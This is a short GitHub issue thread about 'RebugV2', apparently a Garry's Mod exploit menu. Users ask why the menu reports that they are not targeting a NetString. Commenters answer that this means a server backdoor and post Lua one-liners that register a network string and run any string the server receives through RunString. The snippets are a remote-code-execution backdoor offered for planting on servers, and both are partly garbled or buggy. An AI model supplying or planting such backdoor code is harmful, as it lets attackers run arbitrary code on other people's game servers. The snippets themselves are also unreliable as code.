### ISSUE TITLE
You are not targeting a NetString

### ISSUE THREAD

**Issue by SirJames1234** [ProjectRebug/RebugV2-Release#4]
When I try to use any of the features in the menu it says "You are not targeting a NetString" I don't know what to do because I am not into coding or anything so I need help

**Comment by JokinAce** [comment]
NetString = Backdoor

**Comment by saxi200** [comment]
?

**Comment by lolboy587** [comment]
> NetString = Backdoor

is it this cmd util.Backdoor("REBUG")net.Receive("REBUG"),function()RunString(net.ReadString())end)? cuz if it is its not workiand if its not ca you reply with the good cmd for it thanks

**Comment by Void09** [comment]
Execute a netstring here is an example
util.AddNetworkString("rebug")net.Receive("rebug",function()RunString(net.ReadString))end)
